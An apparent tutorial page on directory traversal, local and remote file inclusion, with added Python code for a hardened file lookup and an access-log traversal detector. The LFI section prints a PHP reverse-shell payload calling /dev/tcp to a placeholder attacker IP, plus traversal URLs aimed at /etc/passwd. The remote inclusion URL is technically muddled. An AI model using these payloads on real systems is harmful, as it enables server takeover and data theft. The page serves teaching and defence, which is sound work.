File Inclusion

Regrouping Directory Traversal, Local File Inclusion, Remote File Inclusion

File Inclusion vulnerabilities are security weaknesses in web applications that allow an attacker to include, and in some cases execute, local or remote files through the application, potentially leading to sensitive data exposure, server takeover, or other malicious actions. They are usually the result of poor input validation.

Directory Traversal

Also known as Path Traversal, this vulnerability is a security weakness in web applications that allows an attacker to access files and directories outside of the intended directory or root folder, potentially leading to unauthorized disclosure or modification of sensitive data or system files. This vulnerability occurs when input parameters are not properly validated or sanitized.

Let's say you have a web application that serves files to authenticated users. The server stores user-uploaded files, usually text ones, and the application retrieves these files using a URL like this:

https://example.com/getfile.php?filename=myfile.txt

To retrieve files elsewhere in the filesystem, all we have to do is query them by walking up the directory tree with ../ sequences:

https://example.com/getfile.php?filename=../../../../etc/passwd

To mitigate this vulnerability, the server-side code should validate and sanitize the input parameters to prevent any path traversal sequences from being used. One way to do this is to restrict the filename parameter to a whitelist of allowed characters or filenames and ensure that any path components are properly separated and validated.
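The following is an added example, not code from the original page: a hardened counterpart to the getfile.php lookup above, written in Python so the checks can be read independently of the web framework. The base directory and the allowed file extensions are assumptions. It applies the allowlist the paragraph describes and, as a second, independent layer, a canonical-path check, and it also rejects absolute paths and URL schemes so the same function covers the Remote File Inclusion case discussed later on this page.

```python
"""Hardened file lookup for a getfile-style endpoint (added example, not the page's code).

The user-supplied name is accepted only if it passes an allowlist AND the
resolved path stays inside the upload directory; either check alone blocks
the ../../../../etc/passwd request shown on the page.
"""
import os
import re
from typing import Optional
from urllib.parse import unquote

# Assumption: user uploads live here and only these plain-text names are legitimate.
BASE_DIR = os.path.realpath("/var/www/uploads")  # assumed location
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(txt|md|csv)$")


def resolve_upload(filename: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Return the canonical path to serve, or None if the request must be rejected."""
    # Decode exactly once so %2e%2e%2f is seen as ../ ; decoding in a loop
    # would itself be a bug (it lets %252e%252e through the first check).
    name = unquote(filename)
    # Null bytes historically truncated paths in C-based runtimes; reject outright.
    if "\x00" in name:
        return None
    # Remote locations (RFI) and absolute paths are never legitimate upload names.
    if "://" in name or name.startswith(("/", "\\")):
        return None
    # Allowlist on the bare name: no separators, so no traversal is possible.
    if not ALLOWED_NAME.fullmatch(name):
        return None
    candidate = os.path.realpath(os.path.join(base_dir, name))
    # Canonical containment check: commonpath rather than startswith, so a
    # sibling such as /var/www/uploads2 is not mistaken for a child directory.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate


def is_served(filename: str) -> bool:
    """Convenience wrapper: would this request be answered with a file?"""
    return resolve_upload(filename) is not None
```

The order matters: the cheap string checks run before any filesystem call, and the containment check is kept even though the allowlist already makes traversal impossible, so a future loosening of the allowlist (for example to permit subdirectories) does not silently reopen the hole.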

Path traversal vulnerabilities can potentially allow an attacker to access any file or directory that is readable by the web server process and is outside of the intended directory or root folder. Here are some examples of directories or files that are commonly targeted using path traversal attacks:

  1. Configuration files: An attacker may try to access configuration files such as wp-config.php for WordPress or settings.py for Django to extract sensitive information such as database credentials.

  2. System files: An attacker may try to access system files such as /etc/passwd or /etc/shadow to extract sensitive information such as user account details or password hashes.

  3. Application files: An attacker may try to access files such as index.php or default.aspx to modify the application's behavior or to upload malicious code.

  4. Log files: An attacker may try to access log files such as access.log or error.log to learn more about the system and to identify potential vulnerabilities.
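From the detection side, the file list above is exactly what a log rule should look for. The following is an added example, not from the original page: it scans access-log lines for traversal sequences (raw and percent-decoded) and for the sensitive targets named in the list, and reports which attempts actually returned a 200. The log lines are constructed for the example; the IP addresses are documentation ranges, not real hosts.

```python
"""Path traversal detection over web access logs (added example, not the page's code)."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Targets named on the page; extend this tuple for your own stack.
SENSITIVE_TARGETS = (
    "wp-config.php", "settings.py", "/etc/passwd", "/etc/shadow",
    "access.log", "error.log",
)
# ../ and ..\ plus the overlong UTF-8 encodings some older servers accepted.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|\.\.%c0%af|\.\.%c1%9c)", re.IGNORECASE)
# Apache combined-log layout: client, timestamp, request line, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic (not real logs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /getfile.php?filename=myfile.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /getfile.php?filename=../../../../etc/passwd HTTP/1.1" 200 1402 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /getfile.php?filename=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 221 "-" "curl/8.0"
198.51.100.9 - - [10/Mar/2024:12:00:04 +0000] "GET /getfile.php?filename=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 199 "-" "python-requests/2.31"
198.51.100.9 - - [10/Mar/2024:12:00:05 +0000] "GET /static/logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def decode_repeatedly(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable. Detection can afford to over-decode;
    a server-side validator should not (see the hardening example above)."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def scan_access_log(text: str) -> List[Dict]:
    """Return one finding per request that shows traversal or a sensitive target."""
    findings = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        raw = m.group("path")
        decoded = decode_repeatedly(raw)
        # Match on both raw and decoded so the attacker's encoding choice is irrelevant.
        traversal = bool(TRAVERSAL.search(raw) or TRAVERSAL.search(decoded))
        targets = [t for t in SENSITIVE_TARGETS if t in decoded]
        if traversal or targets:
            status = int(m.group("status"))
            findings.append({
                "ip": m.group("ip"),
                "path": decoded,
                "traversal": traversal,
                "targets": targets,
                "served": status == 200,  # a 200 means the file likely left the server
            })
    return findings


def repeat_offenders(findings: List[Dict], threshold: int = 2) -> List[str]:
    """Clients with at least `threshold` flagged requests, for alert prioritisation."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```

The "served" flag is the field that turns a noisy scanner alert into an incident: a traversal attempt that returned 200 for /etc/passwd needs a very different response from one that was refused with 403.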

Local File Inclusion

Local File Inclusion follows the same core logic, but the file retrieved is executed by the server rather than simply returned to the client.

Referring to our previous example, what if, using the application's ability to upload custom profile pictures, I had previously uploaded a reverse shell akin to this instead of a legitimate image?

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[my_ip]/[my_open_port] 0>&1'");
?>

All I would have to do then is query my reverse shell, neatly located in the upload directory:

https://example.com/getfile.php?filename=../../../../../uploads/revshell.php

The reverse shell, now executed by the server, connects back to the open port on my machine.

Remote File Inclusion

Remote File Inclusion again follows the same core logic, with the added implication that the requested file can live in a remote location ... such as one's own computer. Still in keeping with our previous examples, an RFI would allow me to query the following:

https://example.com/getfile.php?filename=../../../../../[my_ip]:[my_open_port]/revshell.php
